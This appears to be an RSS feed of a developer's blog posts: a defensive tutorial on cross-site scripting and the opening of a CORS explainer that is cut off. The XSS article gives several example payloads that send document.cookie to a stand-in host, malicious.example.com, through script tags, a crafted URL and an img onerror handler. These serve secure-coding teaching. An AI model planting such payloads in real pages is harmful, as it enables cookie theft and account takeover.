The latest articles on DEV Community by Sam Leung (@samleung). https://dev.to/samleung https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3174274%2Ff3c7ace4-dd11-450f-9e35-0ef554b5d7a8.png https://dev.to/samleung en Sam Leung Tue, 21 Oct 2025 05:25:08 +0000 https://dev.to/samleung/understanding-xss-cross-site-scripting-how-attackers-inject-code-into-your-website-38ac https://dev.to/samleung/understanding-xss-cross-site-scripting-how-attackers-inject-code-into-your-website-38ac <p>Web applications frequently handle user-generated input. When this input is not processed securely, an attacker may insert executable code that runs in other users' browsers. This vulnerability is known as <strong>Cross-Site Scripting (XSS)</strong>.</p> <p>This blog explains what XSS is, how it functions, its primary types, and technical approaches for mitigation.</p> <p> </p> <h2> Table of Contents </h2> <ol> <li>What is Cross-Site Scripting (XSS)</li> <li>How XSS Works</li> <li> Types of XSS <ul> <li>3.1. Stored XSS</li> <li>3.2. Reflected XSS</li> <li>3.3. DOM-Based XSS</li> <li>3.4. Difference Between the Three Methods</li> </ul> </li> <li>What Attackers Can Do with XSS</li> <li> Prevention Methods <ul> <li>5.1. Escape and Sanitize Output</li> <li>5.2. Validate User Input</li> <li>5.3. Use Safe DOM Methods</li> <li>5.4. Apply a Content Security Policy (CSP)</li> <li>5.5. Rely on Framework Security Defaults</li> <li>5.6. Protect Cookies</li> <li>5.7. Regular Testing and Monitoring</li> </ul> </li> <li>Summary</li> <li>References</li> </ol> <p> </p> <h2> 1. What is Cross Site Scripting (XSS) </h2> <p><strong>Cross-Site Scripting (XSS)</strong> is a web application security flaw that allows attackers to inject client-side scripts into web pages that other users view. When successful, the code runs right inside someone's browser, pretending to be part of the legitimate website. Because the browser trusts the site, it also trusts the attacker's code, that's when the trouble starts.</p> <p>When exploited, an attacker can:</p> <ul> <li>Steal session cookies or authentication tokens</li> <li>Impersonate another user</li> <li>Display fake messages or phishing prompts</li> <li>Redirect users to malicious sites</li> </ul> <p><strong>Example:</strong><br> Imagine a comment section that doesn't properly filter user input.<br> An attacker posts something like:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Great post! &lt;script&gt;document.location='https://malicious.example.com/steal?cookie='+document.cookie&lt;/script&gt; </code></pre> </div> <p>If the website just displays this comment as-is, every visitor who views it will unknowingly run that script in their browser. Their cookie data - basically their login proof, gets sent straight to the attacker's site.</p> <p> </p> <h2> 2. How XSS Works </h2> <p><strong>Cross-Site Scripting (XSS)</strong> occurs when a web application accepts untrusted input and embeds it into a web page without applying proper escaping or validation. As a result, the browser interprets the input as executable code instead of plain text.</p> <p>This vulnerability enables attackers to inject client-side scripts that execute in the context of a trusted website.</p> <p><strong>Process overview:</strong></p> <ol> <li>An attacker submits a payload containing executable code through a web form, message, or URL parameter</li> <li>The web application reflects or stores this input and includes it in the page's response</li> <li>When a user loads the affected page, the browser executes the injected script as part of the website</li> </ol> <p><strong>Example: Comment Submission Vulnerability</strong></p> <p>Consider a web application that allows users to submit comments:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;form</span> <span class="na">action=</span><span class="s">"/comment"</span> <span class="na">method=</span><span class="s">"POST"</span><span class="nt">&gt;</span> <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"text"</span> <span class="na">name=</span><span class="s">"username"</span> <span class="na">placeholder=</span><span class="s">"Your name"</span> <span class="nt">/&gt;</span> <span class="nt">&lt;textarea</span> <span class="na">name=</span><span class="s">"comment"</span> <span class="na">placeholder=</span><span class="s">"Leave a comment"</span><span class="nt">&gt;&lt;/textarea&gt;</span> <span class="nt">&lt;button</span> <span class="na">type=</span><span class="s">"submit"</span><span class="nt">&gt;</span>Post<span class="nt">&lt;/button&gt;</span> <span class="nt">&lt;/form&gt;</span> </code></pre> </div> <p>A legitimate comment might be:</p> <blockquote> <p>"Great article! Very helpful."</p> </blockquote> <p>However, an attacker could submit the following input instead:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;script&gt;</span> <span class="nf">fetch</span><span class="p">(</span><span class="dl">'</span><span class="s1">https://malicious.example.com/steal?cookie=</span><span class="dl">'</span> <span class="o">+</span> <span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">);</span> <span class="nt">&lt;/script&gt;</span> </code></pre> </div> <p>If the application directly displays this comment without sanitization, the output might look like:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"comment"</span><span class="nt">&gt;</span> <span class="nt">&lt;strong&gt;</span>User:<span class="nt">&lt;/strong&gt;</span> TestUser <span class="nt">&lt;p&gt;&lt;script&gt;</span><span class="nf">fetch</span><span class="p">(</span><span class="dl">'</span><span class="s1">https://malicious.example.com/steal?cookie=</span><span class="dl">'</span> <span class="o">+</span> <span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">);</span><span class="nt">&lt;/script&gt;&lt;/p&gt;</span> <span class="nt">&lt;/div&gt;</span> </code></pre> </div> <p>In this case, when another user views the page, the browser executes the embedded script.<br> The script sends the viewer's cookies-possibly containing session identifiers or authentication tokens-to the attacker's external server.</p> <p> </p> <h2> 3. Types of XSS </h2> <p>Cross-Site Scripting (XSS) vulnerabilities are classified into three main types, depending on where and how malicious code is injected and executed:</p> <ul> <li> <strong>Stored XSS (Persistent XSS)</strong> - the payload is stored on the server (e.g., in a database or profile) and served to users later.</li> <li> <strong>Reflected XSS (Non-Persistent XSS)</strong> - the payload is included in the current HTTP request and immediately reflected back in the server's response.</li> <li> <strong>DOM-Based XSS (Client-Side XSS)</strong> - the payload is executed entirely within the client's browser by manipulating the DOM through insecure JavaScript.</li> </ul> <p> </p> <h3> 3.1. Stored XSS (Persistent XSS) </h3> <p><strong>Stored XSS</strong>, also known as <strong>Persistent XSS</strong>, arises when a server-side component stores untrusted user input (such as posts, comments, or profile information) and subsequently displays that content on a web page without proper sanitization or escaping.</p> <p>When other users view the affected page, the malicious script executes in their browsers with the permissions of the vulnerable website.</p> <p>This type of XSS is considered more severe than reflected or DOM-based variants because the injected code remains active until it is manually removed or sanitized.</p> <p><strong>Example Scenario</strong></p> <p>Consider a social platform that allows users to post status updates:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;form</span> <span class="na">action=</span><span class="s">"/post"</span> <span class="na">method=</span><span class="s">"POST"</span><span class="nt">&gt;</span> <span class="nt">&lt;textarea</span> <span class="na">name=</span><span class="s">"message"</span> <span class="na">placeholder=</span><span class="s">"Share something interesting..."</span><span class="nt">&gt;&lt;/textarea&gt;</span> <span class="nt">&lt;button</span> <span class="na">type=</span><span class="s">"submit"</span><span class="nt">&gt;</span>Post<span class="nt">&lt;/button&gt;</span> <span class="nt">&lt;/form&gt;</span> </code></pre> </div> <p>An attacker could submit a message containing malicious JavaScript code:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;script&gt;</span> <span class="nf">fetch</span><span class="p">(</span><span class="dl">'</span><span class="s1">https://malicious.example.com/steal?cookie=</span><span class="dl">'</span> <span class="o">+</span> <span class="nf">encodeURIComponent</span><span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">));</span> <span class="nt">&lt;/script&gt;</span> </code></pre> </div> <p>If the application stores this message directly in a database and later retrieves it without sanitization, the generated page might look like this:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"post"</span><span class="nt">&gt;</span> <span class="nt">&lt;strong&gt;</span>User:<span class="nt">&lt;/strong&gt;</span> TestUser <span class="nt">&lt;p&gt;&lt;script&gt;</span> <span class="nf">fetch</span><span class="p">(</span><span class="dl">'</span><span class="s1">https://malicious.example.com/steal?cookie=</span><span class="dl">'</span> <span class="o">+</span> <span class="nf">encodeURIComponent</span><span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">));</span> <span class="nt">&lt;/script&gt;&lt;/p&gt;</span> <span class="nt">&lt;/div&gt;</span> </code></pre> </div> <p>Whenever a user loads the page, the script runs and can perform actions such as stealing session cookies, redirecting the browser, or altering the page's content.</p> <p>This payload remains active until manually removed or sanitized, making <strong>stored XSS</strong> the most dangerous variant.</p> <p><strong>Key Points</strong></p> <ul> <li>The payload is permanently stored on the server and runs whenever the data is displayed.</li> <li>Affects all users who view the compromised page.</li> <li>Common in systems with user-generated content (forums, profiles, reviews, comments).</li> <li>Prevented through <strong>server-side sanitization</strong>, <strong>contextual output encoding</strong>, and <strong>Content Security Policy (CSP)</strong> enforcement.</li> </ul> <p> </p> <h3> 3.2. Reflected XSS (Non-Persistent XSS) </h3> <p><strong>Reflected XSS</strong>, also known as <strong>Non-Persistent XSS</strong>, occurs when malicious script code is included within a request-such as a crafted URL or form submission-and the web application immediately reflects that input back into the HTTP response without proper validation or escaping.</p> <p>Unlike <strong>Stored XSS</strong>, the payload is <strong>not saved on the server</strong>. Instead, it is delivered to the victim through a specially crafted link or request.<br> When the victim opens the malicious link, the injected code is reflected by the vulnerable page and executed in the victim's browser.</p> <p><strong>Example Scenario</strong></p> <p>Consider a search page that takes a <code>query</code> parameter and directly displays it on the page without sanitizing user input:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;form</span> <span class="na">action=</span><span class="s">"/search"</span> <span class="na">method=</span><span class="s">"GET"</span><span class="nt">&gt;</span> <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"text"</span> <span class="na">name=</span><span class="s">"query"</span> <span class="na">placeholder=</span><span class="s">"Search..."</span> <span class="nt">/&gt;</span> <span class="nt">&lt;button</span> <span class="na">type=</span><span class="s">"submit"</span><span class="nt">&gt;</span>Search<span class="nt">&lt;/button&gt;</span> <span class="nt">&lt;/form&gt;</span> </code></pre> </div> <p>A normal query URL:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>https://example.com/search?query=security+tutorial </code></pre> </div> <p>A malicious URL crafted by an attacker:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>https://example.com/search?query=&lt;script&gt;fetch('https://malicious.example.com/steal?cookie='+document.cookie)&lt;/script&gt; </code></pre> </div> <p>If the response page renders that query value unsafely:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;p&gt;</span>Search results for: <span class="nt">&lt;b&gt;&lt;script&gt;</span><span class="nf">fetch</span><span class="p">(</span><span class="dl">'</span><span class="s1">https://malicious.example.com/steal?cookie=</span><span class="dl">'</span><span class="o">+</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">)</span><span class="nt">&lt;/script&gt;&lt;/b&gt;&lt;/p&gt;</span> </code></pre> </div> <p><strong>Key Points</strong></p> <ul> <li>Payload is transient, not stored on the server.</li> <li>Requires user interaction (e.g., clicking a crafted link).</li> <li>Commonly found in search, login, and error pages that reflect input.</li> <li>Prevented through <strong>HTML/JavaScript output encoding</strong>, <strong>input validation</strong>, and <strong>CSP</strong>.</li> </ul> <p> </p> <h3> 3.3. DOM Based XSS (Client Side XSS) </h3> <p><strong>DOM-Based XSS</strong>, also known as <strong>Client-Side XSS</strong>, occurs when a web page's JavaScript code dynamically modifies the Document Object Model (DOM) using data from a user-controlled source (such as the URL, query string, or hash fragment) <strong>without proper validation or encoding</strong>.</p> <p>In this type of attack, the malicious payload never touches the server. Instead, it executes entirely within the user's browser.<br> The vulnerability exists because client-side scripts read untrusted input and use it to write directly into the page structure (e.g., using <code>innerHTML</code>, <code>document.write()</code>, or similar methods).</p> <p><strong>Example Scenario</strong></p> <p>A web application personalizes a "welcome" message using data from the URL hash fragment:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html</span> <span class="na">lang=</span><span class="s">"en"</span><span class="nt">&gt;</span> <span class="nt">&lt;head&gt;</span> <span class="nt">&lt;meta</span> <span class="na">charset=</span><span class="s">"UTF-8"</span><span class="nt">&gt;</span> <span class="nt">&lt;title&gt;</span>DOM XSS Example<span class="nt">&lt;/title&gt;</span> <span class="nt">&lt;/head&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h2</span> <span class="na">id=</span><span class="s">"greeting"</span><span class="nt">&gt;</span>Welcome!<span class="nt">&lt;/h2&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">const</span> <span class="nx">name</span> <span class="o">=</span> <span class="nx">location</span><span class="p">.</span><span class="nx">hash</span><span class="p">.</span><span class="nf">substring</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">greeting</span><span class="dl">"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">Welcome, </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">name</span><span class="p">;</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <p>A normal visit:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>https://example.com#TestUser </code></pre> </div> <p>Displays:<br> <strong>Welcome, TestUser</strong></p> <p>However, an attacker could send a crafted URL such as:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>https://example.com#&lt;img src=x onerror=fetch('https://malicious.example.com/steal?cookie='+document.cookie)&gt; </code></pre> </div> <p>When the victim opens this link, the vulnerable JavaScript reads the fragment and inserts it directly into the DOM using <code>innerHTML</code>.<br> The injected script is executed on the client side, allowing theft of cookies or manipulation of page content.</p> <p><strong>Safer Implementation</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">const</span> <span class="nx">name</span> <span class="o">=</span> <span class="nx">location</span><span class="p">.</span><span class="nx">hash</span><span class="p">.</span><span class="nf">substring</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">greeting</span><span class="dl">"</span><span class="p">).</span><span class="nx">textContent</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">Welcome, </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">name</span><span class="p">;</span> </code></pre> </div> <p>By using <code>.textContent</code> (or proper encoding libraries), the data is inserted as plain text rather than executable HTML, neutralizing the attack vector.</p> <p><strong>Key Points</strong></p> <ul> <li>Executes purely in the client environment</li> <li>Requires no server reflection or storage</li> <li>Common in JavaScript-driven single-page applications (SPAs)</li> <li>Prevented by <strong>safe DOM manipulation</strong>, <strong>sanitizing dynamic data</strong>, and <strong>restrictive CSP policies</strong> </li> </ul> <p> </p> <h3> 3.4. Difference Between the Three Methods </h3> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th><strong>Attribute</strong></th> <th><strong>Stored XSS (Persistent)</strong></th> <th><strong>Reflected XSS (Non-Persistent)</strong></th> <th><strong>DOM-Based XSS (Client-Side)</strong></th> </tr> </thead> <tbody> <tr> <td><strong>Location of Vulnerability</strong></td> <td>Server stores and reuses unsanitized input</td> <td>Server reflects unsanitized input in response</td> <td>Browser's JavaScript handles untrusted data insecurely</td> </tr> <tr> <td><strong>Where the Payload Resides</strong></td> <td>Stored in server-side data sources (database, log, CMS)</td> <td>Contained in crafted links or form submissions</td> <td>Exists only in client-side DOM or URL fragment</td> </tr> <tr> <td><strong>When Code Executes</strong></td> <td>When the affected page is viewed by any user</td> <td>When the victim clicks or accesses the malicious link</td> <td>When client-side JavaScript processes untrusted input</td> </tr> <tr> <td><strong>Server Involvement</strong></td> <td>High - vulnerability in backend handling</td> <td>Medium - server reflects input unsafely</td> <td>None - vulnerability exists only in frontend code</td> </tr> <tr> <td><strong>User Interaction Required</strong></td> <td>No</td> <td>Yes (victim must trigger request)</td> <td>Optional (depends on page functionality)</td> </tr> <tr> <td><strong>Common Targets</strong></td> <td>Comment systems, forums, message boards</td> <td>Search results, error messages, login forms</td> <td>Dynamic SPAs, interactive client-side components</td> </tr> <tr> <td><strong>Risk Scope</strong></td> <td>Affects all users of the application</td> <td>Affects a single targeted user</td> <td>Affects users executing the vulnerable JS feature</td> </tr> <tr> <td><strong>Mitigation Focus</strong></td> <td>Sanitize and encode stored data before output</td> <td>Encode and escape reflected data in responses</td> <td>Validate and safely handle data in client DOM operations</td> </tr> </tbody> </table></div> <p>Cross-Site Scripting (XSS) vulnerabilities exploit weaknesses in how web applications handle user-controlled input.<br> Although the execution mechanism varies, the ultimate goal is consistent across all types - <strong>inject malicious scripts into a trusted context to execute in the user's browser</strong>.</p> <ul> <li> <strong>Stored XSS</strong> poses the highest risk since payloads persist on the server and affect all users viewing the content.</li> <li> <strong>Reflected XSS</strong> relies on social engineering to make victims click malicious links that cause immediate temporary script execution.</li> <li> <strong>DOM-Based XSS</strong> originates from insecure JavaScript practices and executes entirely on the client side without server participation.</li> </ul> <p> </p> <h2> 4. What Attackers Can Do with XSS </h2> <p>Once an attacker successfully exploits an <strong>XSS vulnerability</strong>, they gain the ability to execute arbitrary JavaScript in the victim's browser within the context of a trusted website.<br> Because the code runs as if it were part of the legitimate page, the attacker can leverage it to perform numerous malicious actions.</p> <p><strong>Potential impacts include:</strong></p> <ul> <li><p><strong>Session Hijacking and Account Takeover:</strong><br> Access or exfiltrate authentication cookies, JSON Web Tokens (JWTs), or session identifiers to impersonate the victim.</p></li> <li><p><strong>User Impersonation and Unauthorized Actions:</strong><br> Perform privileged actions on behalf of authenticated users - such as transferring funds, changing passwords, or sending messages.</p></li> <li><p><strong>Data Exposure and Theft:</strong><br> Read sensitive information displayed on the page or pulled via AJAX, including personal data, order details, or internal messages.</p></li> <li><p><strong>Credential Harvesting and Phishing:</strong><br> Inject fake login forms or overlays designed to capture user credentials.</p></li> <li><p><strong>Website Defacement or Misleading Modifications:</strong><br> Alter displayed text, interface elements, or media content to misinform or damage reputation.</p></li> <li><p><strong>Command Execution or Malware Delivery:</strong><br> Redirect users to malicious sites, load external JavaScript payloads, or deliver browser exploits.</p></li> <li><p><strong>Network Pivoting and Exploitation:</strong><br> Use authenticated sessions to attack other services or endpoints accessible from the victim's environment.</p></li> </ul> <blockquote> <p>Even a simple XSS vulnerability can have <strong>severe consequences</strong>, depending on the privileges of the victim user and the sensitivity of accessible data.</p> </blockquote> <p> </p> <h2> 5. Prevention Methods </h2> <p>XSS prevention requires a <strong>multi-layered defense strategy</strong>, combining rigorous input handling, secure coding practices, browser-based protections, and ongoing security maintenance.<br> No single safeguard is sufficient on its own - effective XSS mitigation relies on consistent application of the following principles.</p> <h3> 5.1. Escape and Sanitize Output </h3> <p>Always treat all user-supplied data as <strong>untrusted</strong>, and <strong>encode output properly</strong> before including it in HTML, JavaScript, or attribute contexts.<br> This prevents browsers from interpreting user input as executable code.</p> <p><strong>Practical Guidelines:</strong></p> <ul> <li>Replace or encode special characters such as <code>&lt;</code>, <code>&gt;</code>, <code>'</code>, <code>"</code>, and <code>&amp;</code>.</li> <li> <p>Use <strong>context-aware escaping</strong> depending on where the data is inserted:</p> <ul> <li> <strong>HTML encoding (for text content):</strong> Convert special characters to entities so they appear as plain text. Example: <code>&lt;script&gt;</code> -&gt; <code>&amp;lt;script&amp;gt;</code> </li> <li> <strong>Attribute encoding (for HTML attributes):</strong> Encode quotes and angle brackets to stop injection inside attribute values. Example: <code>" onerror="alert(1)</code> -&gt; <code>&amp;quot; onerror=&amp;quot;alert(1)</code> </li> <li> <strong>JavaScript string escaping (for dynamic script values):</strong> Escape quotes and special characters when embedding data into scripts. Example: <code>Alice"; alert('XSS');</code> -&gt; <code>Alice\"; alert('XSS');</code> </li> </ul> </li> </ul> <p>This ensures that user data is rendered safely as <strong>content</strong>, never executed as <strong>code</strong>.</p> <p> </p> <h3> 5.2. Validate User Input </h3> <p>Ensure every input matches expected formats and reject or sanitize anything outside valid ranges.</p> <p><strong>Best practices:</strong></p> <ul> <li>Use <strong>whitelists</strong> instead of blacklists - specify acceptable patterns (e.g., alphanumeric, email format).</li> <li>Enforce <strong>input length limits</strong> to reduce payload size risks</li> <li>Validate input both <strong>client-side</strong> (for user experience) and <strong>server-side</strong> (for security enforcement)</li> <li>Re-validate data before rendering or storage, even if it was validated previously</li> </ul> <p> </p> <h3> 5.3. Use Safe DOM Methods </h3> <p>Avoid JavaScript APIs that interpret content as HTML or executable code, such as:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="nx">innerHTML</span> <span class="nb">document</span><span class="p">.</span><span class="nf">write</span><span class="p">()</span> <span class="nf">eval</span><span class="p">()</span> <span class="nf">setTimeout</span><span class="p">(</span><span class="dl">"</span><span class="s2">code</span><span class="dl">"</span><span class="p">,</span> <span class="nx">delay</span><span class="p">)</span> </code></pre> </div> <p>Instead, use secure APIs that place untrusted content as plain text or structured elements:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="nx">textContent</span> <span class="nx">setAttribute</span> <span class="nx">createElement</span> <span class="nx">appendChild</span> </code></pre> </div> <p><strong>Example:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// Unsafe</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">msg</span><span class="dl">"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">userInput</span><span class="p">;</span> <span class="c1">// Safe</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">msg</span><span class="dl">"</span><span class="p">).</span><span class="nx">textContent</span> <span class="o">=</span> <span class="nx">userInput</span><span class="p">;</span> </code></pre> </div> <p> </p> <h3> 5.4. Apply a Content Security Policy (CSP) </h3> <p>A <strong>Content Security Policy</strong> instructs browsers to restrict what scripts and resources can be loaded or executed.<br> Even if an injected script exists in the page, CSP can prevent it from executing.</p> <p><strong>Example HTTP Header:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err">Content-Security-Policy: script-src 'self'; object-src 'none'; base-uri 'self'; </span></code></pre> </div> <p><strong>Benefits:</strong></p> <ul> <li>Blocks inline scripts (<code>&lt;script&gt;...&lt;/script&gt;</code>) unless explicitly allowed. </li> <li>Prevents loading scripts from untrusted external domains.</li> <li>Reduces XSS impact by blocking data exfiltration via unauthorized requests.</li> </ul> <blockquote> <p>CSP acts as a <strong>defense-in-depth</strong> measure - it complements but does not replace input sanitization and output encoding.</p> </blockquote> <p> </p> <h3> 5.5. Rely on Framework Security Defaults </h3> <p>Modern front-end frameworks (such as <strong>React, Angular, Vue, and Svelte</strong>) implement <strong>automatic HTML escaping</strong> and virtual DOM rendering to minimize direct HTML manipulation.</p> <p><strong>Recommendations:</strong></p> <ul> <li>Do not disable built-in sanitization (e.g., <code>v-html</code> in Vue or <code>[innerHTML]</code> in Angular).</li> <li>Avoid unsafe template injections or string concatenations.</li> <li>Keep frameworks and dependencies updated to the latest security releases.</li> </ul> <p> </p> <h3> 5.6. Protect Cookies </h3> <p>Prevent XSS-attacks from escalating into session hijacking by making cookies inaccessible to JavaScript and enforcing secure transmission.</p> <p><strong>Example:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err">Set-Cookie: sessionid=abc123; HttpOnly; Secure; SameSite=Strict; </span></code></pre> </div> <p><strong>Directive explanation:</strong></p> <ul> <li> <code>HttpOnly</code> - prevents access to cookies via <code>document.cookie</code> </li> <li> <code>Secure</code> - ensures cookies are sent only over HTTPS</li> <li> <code>SameSite</code> - mitigates cross-origin request attacks</li> </ul> <p> </p> <h3> 5.7. Regular Testing and Monitoring </h3> <p>Security is an iterative process. Regular reviews help identify and resolve new or overlooked vulnerabilities.</p> <p><strong>Recommended practices:</strong></p> <ul> <li>Conduct regular <strong>code audits</strong> and <strong>penetration tests</strong> focusing on input-handling logic</li> <li>Use <strong>automated scanners</strong> (like OWASP ZAP or Burp Suite) to detect reflected or stored XSS points</li> <li>Analyze <strong>CSP reports</strong> and browser <strong>security console</strong> messages for blocked resources or violations</li> <li>Maintain an ongoing <strong>patch management</strong> process for your framework, dependencies, and build pipelines</li> </ul> <p> </p> <h2> 6. Summary </h2> <p><strong>Cross-Site Scripting (XSS)</strong> is one of the most prevalent and damaging web vulnerabilities, enabling attackers to inject and execute untrusted code in user browsers.</p> <p>While the <strong>Stored</strong>, <strong>Reflected</strong>, and <strong>DOM-Based</strong> variants differ in execution paths, they share a common root cause - <strong>improper handling of untrusted input</strong>.</p> <p>Once triggered, XSS can lead to stolen credentials, session hijacking, phishing attacks, or unauthorized actions on behalf of the user.</p> <p><strong>Effective defense requires a layered approach:</strong></p> <ol> <li> <strong>Validate and sanitize input</strong> according to strict format and length rules</li> <li> <strong>Escape or encode outputs</strong> properly for HTML, attribute, or JavaScript contexts</li> <li> <strong>Use safe DOM APIs</strong> (<code>textContent</code>, <code>setAttribute</code>) instead of unsafe APIs (<code>innerHTML</code>, <code>eval</code>)</li> <li> <strong>Apply Content Security Policy (CSP)</strong> to restrict where scripts can run</li> <li> <strong>Rely on framework protections</strong> that automatically sanitize output</li> <li> <strong>Secure cookies and sessions</strong> using <code>HttpOnly</code>, <code>Secure</code>, and <code>SameSite</code> flags</li> <li> <strong>Regularly test, audit, and monitor</strong> both backend and frontend code for new attack vectors</li> </ol> <blockquote> <p>By following these layered defenses, developers can significantly reduce exposure to XSS and ensure the web application maintains confidentiality, integrity, and trustworthiness for all users.</p> </blockquote> <p> </p> <h2> 7. References </h2> <ul> <li><a href="https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/XSS" rel="noopener noreferrer">MDN - Cross-site scripting (XSS)</a></li> <li><a href="https://owasp.org/www-community/attacks/xss/" rel="noopener noreferrer">OWASP - Cross Site Scripting (XSS)</a></li> <li><a href="https://owasp.org/www-community/Types_of_Cross-Site_Scripting" rel="noopener noreferrer">OWASP - Types of XSS</a></li> <li><a href="https://www.cloudflare.com/learning/security/threats/cross-site-scripting/" rel="noopener noreferrer">Cloudflare - What is cross-site scripting?</a></li> <li><a href="https://dev.to/trixsec/series/29668">Mastering Cross-Site Scripting (XSS) Series' Articles</a></li> </ul> web security xss Sam Leung Sat, 18 Oct 2025 11:31:04 +0000 https://dev.to/samleung/web-security-101-from-sop-to-cors-understanding-the-webs-cross-origin-security-model-38dh https://dev.to/samleung/web-security-101-from-sop-to-cors-understanding-the-webs-cross-origin-security-model-38dh <p>Modern web applications are rarely confined to a single domain. Instead, they often operate across <strong>multiple subdomains</strong>, each responsible for a specific part of the system. </p> <p>For example, your <strong>frontend</strong> could be hosted at <code>https://app.example.com</code>, your <strong>API</strong> might live at <code>https://api.example.com</code>, and files or media could be served from <code>https://fs.example.com</code>. You might even have a dedicated <strong>authentication service</strong> at <code>https://auth.example.com</code> to handle user logins, token issuance, and identity management. </p> <p> </p> <p>That architecture is powerful, until you hit the dreaded error:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Access to fetch at 'https://api.example.com' from origin 'https://app.example.com' has been blocked by CORS policy: No 'Access-Control-Allow-Origin' header is present on the requested resource. </code></pre> </div> <p> </p> <p>If you’ve seen that, welcome — you’ve just met <strong>CORS (Cross-Origin Resource Sharing)</strong>, the security mechanism browsers use to safely break the rules of the <strong>Same-Origin Policy (SOP)</strong>.</p> <p> </p> <p>This article walks you through what <strong>SOP</strong> is, what <strong>CORS</strong> really does, and how to configure your backend (with examples) to handle cross-origin requests properly.</p> <p> </p> <h2> Table of Contents </h2> <ol> <li>What Is an Origin?</li> <li>The Same-Origin Policy</li> <li>What Is a Cross-Origin Request?</li> <li>What Is CORS (Cross-Origin Resource Sharing)?</li> <li>Simple CORS Requests</li> <li>Preflight Requests</li> <li>Key CORS Headers Explained</li> <li>CORS with Cookies and Credentials</li> <li>Practical Example: CORS in Rust (Axum)</li> <li>API Gateway and Backend: Where Should You Configure CORS?</li> <li>Loading Resources Cross‑Domain with the <code>&lt;script&gt;</code> Tag</li> <li>A Short History of CORS</li> <li>Summary</li> <li>References</li> </ol> <p> </p> <h2> 1. What Is an Origin? </h2> <p>An <strong>origin</strong> is defined as the combination of:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>scheme (protocol) + host (domain) + port </code></pre> </div> <p>For example: <code>https://example.com:443</code></p> <ul> <li> <code>scheme (protocol)</code>: https</li> <li> <code>host</code>: example.com</li> <li> <code>port</code>: 443</li> </ul> <p>Two pages share the same origin only if all three are identical.</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>URL</th> <th>Same as <code>https://app.example.com/a.html</code>?</th> <th>Why</th> </tr> </thead> <tbody> <tr> <td><code>https://app.example.com/b.html</code></td> <td>✅ Yes</td> <td>Same scheme, domain, and port</td> </tr> <tr> <td><code>http://app.example.com/c.html</code></td> <td>❌ No</td> <td>Different scheme</td> </tr> <tr> <td><code>https://sub.app.example.com/d.html</code></td> <td>❌ No</td> <td>Different domain</td> </tr> <tr> <td><code>https://app.example.com:8080/e.html</code></td> <td>❌ No</td> <td>Different port</td> </tr> </tbody> </table></div> <p> </p> <h2> 2. The Same Origin Policy </h2> <p>Before diving into CORS, you must understand its foundation, the <strong>Same-Origin Policy</strong>.</p> <p>This rule is the browser’s built‑in firewall. It prevents malicious websites from freely interacting with another site you’re logged into.</p> <p>In simple terms:</p> <blockquote> <p>“A script loaded from one origin cannot freely read or modify data 